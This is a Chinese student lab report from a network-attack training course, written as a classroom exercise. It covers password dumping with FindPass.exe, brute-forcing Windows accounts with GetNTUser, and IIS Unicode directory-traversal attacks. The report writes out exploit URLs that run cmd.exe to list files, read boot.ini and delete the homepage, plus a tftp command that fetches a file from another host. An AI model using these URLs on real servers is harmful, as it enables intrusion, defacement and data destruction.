网络攻击技术实验报告.docx

1、网络攻击技术实验报告XX技术学院 网络攻击技术实训分组总结报告 XX 班 XX 组组长 XXX 组员 XXX 20XX年 XX 月XX日一、分组计划及评分表分组准备及评分表班 级XX组 长XX项目小组编号XX一、项目名称： 网络攻击技术实验报告二、项目小组的组成（任务分配、根据组员的表现确定其个人系数）：编号姓 名学号在项目小组中的任务个人贡献系数（0.0 1.0）个人得分123456二、网络攻击技术实验总结报告（一） 实训目的实训的目的主要是使得我们掌握网络攻击技术领域的基本理论和方法，具有较强的自律意识和信息安全意识，具有使用网络攻击技术的软硬件产品解决实际问题的能力，能够完成一系列的实验

2、内容，并且能够熟练使用相关工具和软件。在实训 学习和实践过程中，我们以具体的攻击软件和攻击防范工具，进行相关的技术训练，在强化理论的同时，掌握相关操作技能。通过攻击系统实例演示，使我们了解入侵检测系统的原理和使用。通过网络攻击实例，使我们了解网络攻击实现的原理，加强防范意识。通过实践网络攻击与防范攻击技术，使我们掌握网络攻击及防范技术。（二） 实训任务1. 获取管理员密码攻击。将FindPass.exe拷贝到C盘根目录，执行该程序,即可以得到管理员密码等信息2. 暴力破解操作系统密码可以用工具软件GetNTUser3. 利用Unicode漏洞进行的攻击：a) 读取出计算机上目录列表b) 读取对

3、方计算机上装了几个操作系统c) 使用Unicode漏洞删除主页d) 利用Unicode漏洞入侵系统（三）实训 过程及步骤一）物理攻击 获取管理员密码攻击。将FindPass.exe拷贝到C盘根目录，使用命令提示符 进入操作界面，输入Findpass命令，执行该程序,即可以得到管理员密码等信息。如图：图1所示是未设置密码时的信息：图1 如图：图2所示是在设置密码后的现实的信息：图2二）暴力攻击 暴力破解操作系统密码可以用工具软件GetNTUser ，字典攻击是最常见的一种暴力攻击。利用人的习惯思维，并尝试各种可能的组合来猜测密码；强壮的密码可有效击败字典攻击，它应该由多位字母、数字、通配符组成。

4、1）.启动GetNTUser软件，得到如图：图3所示的结果图3 2）.添加主机IP10.130.22.100，如图：图4所示：图4 3）.设置字典的选择，如图：图5所示：图5 4）.字典的穷举设置，如图：图6所示：图6 如图：图7所示：a) 扫描出主机上存在的用户名,管理员为Administratorb) 自动猜测空密码和与用户名相同的密码c) 可以使用指定密码字典猜测密码，密码为空图7三） 漏洞攻击 利用Unicode漏洞进行的攻击：a) 读取出计算机上目录列表b) 读取对方计算机上装了几个操作系统c) 使用Unicode漏洞删除主页d) 利用Unicode漏洞入侵系统 1.在利用Unico

5、de漏洞进行的攻击时之前，ping两个系统是否连通，如图：图8所示：图82.ping通过后，打开浏览器，浏览器地址栏中输入：http:/192.168.1.110/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:得到如图：图9所示的信息：读取出计算机上目录列表图93.读取计算机上的目录列表后，输入：http:/192.168.1.110/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.ini得到如图：图10所示的信息，读取对方计算机上装了几个操作系统：图104.读取对方计算机上装了几

6、个操作系统后， 在C盘装入inetpubwwwrootdefault.asp，如图：图11所示：图11输入：http:/192.168.1.110/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dele+c:inetpubwwwrootdefault.asp得到如图：图12所示的信息，使用Unicode漏洞删除主页：图12删除c:inetpubwwwrootdefault.asp过后的信息，如图：图13所示：图13图115.使用Unicode漏洞删除主页后，利用Unicode漏洞入侵系统1）首先需要向对方服务器上传一些文件2）下载一个tftpd32.ex

7、e，如图：图14所示：图143）首先在本地计算机上搭建一个TFTP服务器，可以使用 tftpd32.exe建立服务器普通文件传输协议TFTP（ Text File Transmission Protocol）一般用来传输单个文件。4）点击tftpd32.exe文件，设置本机IP为192.168.1.100，被攻击的IP为192.168.1.110，接收的文件为idq.dll如图：图15所示：图155）由于权限不够，不能发送名为“idq.dll文件，权限设置好后，系统拒绝传送文件，但是可以从另一个系统获取一个名为“idq.dll”的文件，如图：图16所示：图166）在浏览器中执行命令：http:

8、/192.168.1.100/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+192.168.1.110+get+idq.dll由于权限不够，无法实现。（四）实训 分析与总结（实训 过程遇到的问题、解决方法、收获体会）（1）实训中遇到的问题及解决方法：1. 获取管理员密码攻击时，设置了密码，但是使用FindPass.exe时，没有显示出密码，讲系统重启过后，显示了密码。2. 暴力破解操作系统密码，使用工具软件GetNTUser时，出现拒绝访问，是设置问题。3. 利用Unicode漏洞进行攻击时，获取另一个系统的信息时，开始的两个系统不匹配，

9、无法使用Unicode漏洞进行攻击。设置两个系统的关系，包含有漏洞才可行。4. 使用浏览器连接两个系统的文件传输时，无法找到需要的文件，发现是由于权限不够，设置可读取权限，得到需要的文件。（2）收获体会：获取管理员密码攻击。将FindPass.exe拷贝到C盘根目录，执行该程序,即可以得到管理员密码等信息；暴力破解操作系统密码可以用工具软件GetNTUser；利用Unicode漏洞进行的攻击：读取出计算机上目录列表；读取对方计算机上装了几个操作系统；使用Unicode漏洞删除主页；利用Unicode漏洞入侵系统。本次实训使得我们掌握网络攻击技术领域的基本理论和方法，具有较强的自律意识和信息安全意识，具有使用网络攻击技术的软硬件产品解决实际问题的能力，能够完成一系列的实验内容，并且能够熟练使用相关工具和软件。在实训 学习和实践过程中，我们以具体的攻击软件和攻击防范工具，进行相关的技术训练，在强化理论的同时，掌握相关操作技能。通过攻击系统实例演示，使我们了解入侵检测系统的原理和使用。通过网络攻击实例，使我们了解网络攻击实现的原理，加强防范意识。通过实践网络攻击与防范攻击技术，使我们掌握网络攻击及防范技术。Welcome ToDownload !欢迎您的下载，资料仅供参考！